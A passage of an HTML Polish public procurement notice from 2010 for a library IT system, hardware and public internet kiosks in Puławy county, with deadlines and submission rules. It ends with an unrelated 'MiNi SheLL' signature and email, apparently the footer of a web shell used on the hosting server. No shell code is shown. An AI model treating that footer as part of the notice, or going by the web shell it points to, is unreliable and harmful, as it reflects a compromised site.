Wprowadzenie powyższych zmian może nastąpić tylko w przypadku gdy obie strony umowy (Zamawiający i Wykonawca) zgodnie uznają, że zaszła któraś z wyżej opisanych okoliczności łącznie lub oddzielnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> nie dotyczy<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia zostanie przesłana wraz z zaproszeniem do złożenia ofert wykonawcom, którzy zakwalifikują się do dalszego etapu przetargu ograniczonego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2010 godzina 13:00, miejsce: Powiat Puławski Al. Królewska 19, 24-100 Puławy, Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem niniejszego zamówienia jest dostawa systemu informatycznego wraz z niezbędnym sprzętem komputerowym oraz dostawa PIAP-ów (telecentra i infomaty) celem realizacji projektu pn. Stworzenie systemu informatycznego łączącego biblioteki publiczne z terenu powiatu puławskiego dofinansowanego z Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013 w ramach Działania 4.1 Społeczeństwo informacyjne - nr umowy: 09/09-UDA-RPLU.04.01.00-06-024/09-00-0240. 1. Wniosek o dopuszczenie do udziału w postępowaniu wraz z załącznikami powinien być podpisany przez osoby uprawnione do reprezentowania Wykonawcy. Jeżeli uprawnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy, to do wniosku należy dołączyć oryginał pełnomocnictwa lub jego kopię poświadczoną notarialnie lub przez osoby udzielające pełnomocnictwa. 2. Wymagane dokumenty potwierdzające spełnianie warunków udziału w postępowaniu oraz niepodleganiu wykluczeniu powinny być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez osoby uprawnione do reprezentowania Wykonawcy w tym zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226 , poz. 1817) 3. Wszelkiego rodzaju zawiadomienia, informacje itp. zamawiający i wykonawcy przekazują pisemnie lub faksem. Osoba uprawniona do porozumiewania się: Waldemar Mokrzycki tel. 081 8861184, faks 081 8861136. 4. Dopuszcza się możliwość złożenia wspólnego wniosku o dopuszczenie do udziału w postępowaniu przez dwóch lub więcej Wykonawców w rozumieniu art. 23 ustawy; w przypadku złożenia wspólnego wniosku każdy z Wykonawców musi oddzielnie udokumentować spełnienie wymagań określonych w art. 22 ust. 1 pkt 1 oraz brak podstaw do wykluczenia z niniejszego postępowania o udzielenie zamówienia w okolicznościach określonych w art. 24 ust. 1 ustawy; wymagania określone w art. 22 ust. 1 pkt 2, 3 i 4 ustawy Wykonawcy mogą spełniać wspólnie; Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być załączone do wniosku w formie oryginału lub kopii poświadczonej notarialnie lub przez osoby udzielające pełnomocnictwa. 5. Wniosek w formie pisemnej należy złożyć w trwale zamkniętym opakowaniu (kopercie) opatrzonym nazwą, adresem Wykonawcy oraz napisem: Wniosek o dopuszczenie do udziału w postępowaniu w przetargu ograniczonym na: Dostawę systemu informatycznego wraz z niezbędnym sprzętem komputerowym oraz dostawa PIAPów (telecentra i infomaty)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com